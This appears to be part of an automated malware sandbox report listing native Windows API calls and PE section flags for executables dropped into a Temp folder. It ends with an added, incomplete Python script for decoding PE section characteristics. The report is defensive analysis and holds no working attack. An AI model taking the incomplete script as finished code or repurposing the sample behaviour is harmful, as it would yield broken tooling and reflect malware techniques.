Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8858 ZwAlertThreadByThreadId, 22_2_6C0D8858
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01106F ZwOpenKey,ZwClose, 22_2_6C01106F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 22_2_6C091879
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 22_2_6C003880
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 22_2_6C03A080
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04108B ZwClose, 22_2_6C04108B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 22_2_6C02E090
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A890 ZwQueryDebugFilterState, 22_2_6C04A890
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049890 ZwFsControlFile, 22_2_6C049890
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B60A2 ZwQueryInformationFile, 22_2_6C0B60A2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02F0AE ZwSetInformationWorkerFactory, 22_2_6C02F0AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B0B0 ZwTraceControl, 22_2_6C04B0B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0318B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 22_2_6C0318B9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 22_2_6C03F0BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0070C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 22_2_6C0070C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0400C2 ZwAlertThreadByThreadId, 22_2_6C0400C2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0410D7 ZwOpenKey,ZwCreateKey, 22_2_6C0410D7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0498D0 ZwQueryAttributesFile, 22_2_6C0498D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A0D0 ZwCreateTimer2, 22_2_6C04A0D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B60E9 ZwOpenKey,ZwClose,ZwClose, 22_2_6C0B60E9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap, 22_2_6C0BE0E9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 22_2_6C00B8F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0040FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 22_2_6C0040FD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 22_2_6C009100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 22_2_6C010100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049900 ZwOpenEvent, 22_2_6C049900
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0A5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 22_2_6C0A5100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049920 ZwDuplicateToken, 22_2_6C049920
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C09193B ZwRaiseException,ZwTerminateProcess, 22_2_6C09193B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A130 ZwCreateWaitCompletionPacket, 22_2_6C04A130
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF13B ZwOpenKey,ZwCreateKey, 22_2_6C0DF13B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 22_2_6C02B944
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 22_2_6C00F150
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B150 ZwUnsubscribeWnfStateChange, 22_2_6C04B150
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 22_2_6C00395E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B160 ZwUpdateWnfStateData, 22_2_6C04B160
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A160 ZwCreateWorkerFactory, 22_2_6C04A160
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8966
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 22_2_6C00B171
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D976 ZwCreateFile,ZwCreateFile, 22_2_6C03D976
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091976 ZwCreateEvent, 22_2_6C091976
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 22_2_6C02C182
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B180 ZwWaitForAlertByThreadId, 22_2_6C04B180
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049980 ZwCreateEvent, 22_2_6C049980
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A980 ZwQueryInstallUILanguage, 22_2_6C04A980
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CA189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 22_2_6C0CA189
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B6186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 22_2_6C0B6186
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049990 ZwQueryVolumeInformationFile, 22_2_6C049990
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6C00519E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B1A0 ZwWaitForKeyedEvent, 22_2_6C04B1A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A9B0 ZwQueryLicenseValue, 22_2_6C04A9B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 22_2_6C0DF1B5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap, 22_2_6C03C9BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0919C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 22_2_6C0919C8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F1E4 ZwEnumerateValueKey, 22_2_6C00F1E4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D89E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D89E7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E9ED RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlFreeHeap, 22_2_6C00E9ED
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049A00 ZwProtectVirtualMemory, 22_2_6C049A00
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E216 RtlInitUnicodeString,ZwOpenKey,ZwEnumerateKey,ZwClose, 22_2_6C00E216
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 22_2_6C0D8214
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 22_2_6C004A20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C094A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose, 22_2_6C094A28
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AA20 ZwQuerySecurityAttributesToken, 22_2_6C04AA20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 22_2_6C03B230
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049A30 ZwTerminateThread, 22_2_6C049A30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C008239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 22_2_6C008239
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 22_2_6C091242
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049A50 ZwCreateFile, 22_2_6C049A50
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8A62
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 22_2_6C022280
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B280 ZwWow64DebuggerCall, 22_2_6C04B280
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 22_2_6C03DA88
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AA90 ZwQuerySystemInformationEx, 22_2_6C04AA90
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 22_2_6C03D294
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 22_2_6C00429E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C001AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 22_2_6C001AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00BAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose, 22_2_6C00BAA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C035AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 22_2_6C035AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049AB0 ZwWaitForMultipleObjects, 22_2_6C049AB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03E2BB ZwWaitForAlertByThreadId, 22_2_6C03E2BB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AAC0 ZwQueryWnfStateNameInformation, 22_2_6C04AAC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8ADD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 22_2_6C02FAD0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091AD6 ZwFreeVirtualMemory, 22_2_6C091AD6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BEAE9 memset,RtlInitUnicodeString,RtlInitUnicodeString,ZwEnumerateValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings, 22_2_6C0BEAE9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049AE0 ZwTraceEvent, 22_2_6C049AE0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AAE0 ZwRaiseException, 22_2_6C04AAE0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 22_2_6C004B00
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049B00 ZwSetValueKey, 22_2_6C049B00
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C035306 ZwReleaseKeyedEvent, 22_2_6C035306
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0C131B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009335 ZwClose,ZwClose, 22_2_6C009335
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B48 ZwClose,ZwClose, 22_2_6C033B48
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8B58
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 22_2_6C0B6369
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AB60 ZwReleaseKeyedEvent, 22_2_6C04AB60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C016B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 22_2_6C016B6B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 22_2_6C096365
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C087365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 22_2_6C087365
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AB70 ZwReleaseWorkerFactoryWorker, 22_2_6C04AB70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 22_2_6C033B7A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C098372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 22_2_6C098372
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002B7E ZwSetInformationThread,ZwClose, 22_2_6C002B7E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0C138A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 22_2_6C002B93
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A390 ZwGetCachedSigningLevel, 22_2_6C04A390
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 22_2_6C03939F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A3A0 ZwGetCompleteWnfStateSubscription, 22_2_6C04A3A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0C1BA8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 22_2_6C034BAD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D9BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D9BBE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8BB6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 22_2_6C002BC2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 22_2_6C01A3E0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049BF0 ZwAlertThreadByThreadId, 22_2_6C049BF0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0023F6 ZwClose,RtlFreeHeap, 22_2_6C0023F6
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401915 Sleep,NtTerminateProcess, 27_2_00401915
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402040 NtQuerySystemInformation, 27_2_00402040
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402242 NtQuerySystemInformation, 27_2_00402242
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402313 NtOpenKey, 27_2_00402313
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401921 Sleep,NtTerminateProcess, 27_2_00401921
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401931 Sleep,NtTerminateProcess, 27_2_00401931
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402535 NtEnumerateKey, 27_2_00402535
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401938 Sleep,NtTerminateProcess, 27_2_00401938
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401FD8 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation, 27_2_00401FD8
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401FFE NtQuerySystemInformation,LocalAlloc, 27_2_00401FFE
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402190 NtQuerySystemInformation, 27_2_00402190
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401493 NtAllocateVirtualMemory, 27_2_00401493
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_0040199B Sleep,NtTerminateProcess, 27_2_0040199B
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_004021B5 NtQuerySystemInformation, 27_2_004021B5
Source: 37D8.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 4EDC.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 3AE.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C651.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: B74C.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: E4D7.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FC0C.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FBAD.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: DAA6.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: csdfufc.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: y8WngeDn4q.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
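The static PE lines above list the section characteristics of the dropped files as the analysis engine decoded them (here `.text` is read+execute, the normal layout). The script below is an added example, not part of the Joe Sandbox report: it rebuilds that decode with only the Python standard library by walking the section table of an in-memory PE32, and adds the two static checks an analyst runs before trusting such flags on an unpacker: sections that are both writable and executable, and executable sections that occupy no bytes on disk and are therefore filled at run time. The PE image and its section mix (including a UPX-style empty RWX section) are constructed inline for illustration and do not describe any file in this report.

```python
import struct
from typing import List, NamedTuple

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h), in ascending bit order
SECTION_FLAGS = [
    (0x00000020, "IMAGE_SCN_CNT_CODE"),
    (0x00000040, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
    (0x00000080, "IMAGE_SCN_CNT_UNINITIALIZED_DATA"),
    (0x02000000, "IMAGE_SCN_MEM_DISCARDABLE"),
    (0x20000000, "IMAGE_SCN_MEM_EXECUTE"),
    (0x40000000, "IMAGE_SCN_MEM_READ"),
    (0x80000000, "IMAGE_SCN_MEM_WRITE"),
]
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


class Section(NamedTuple):
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int


def flag_names(characteristics: int) -> List[str]:
    """Decode Characteristics into the IMAGE_SCN_* names the report prints."""
    return [name for bit, name in SECTION_FLAGS if characteristics & bit]


def parse_sections(image: bytes) -> List[Section]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
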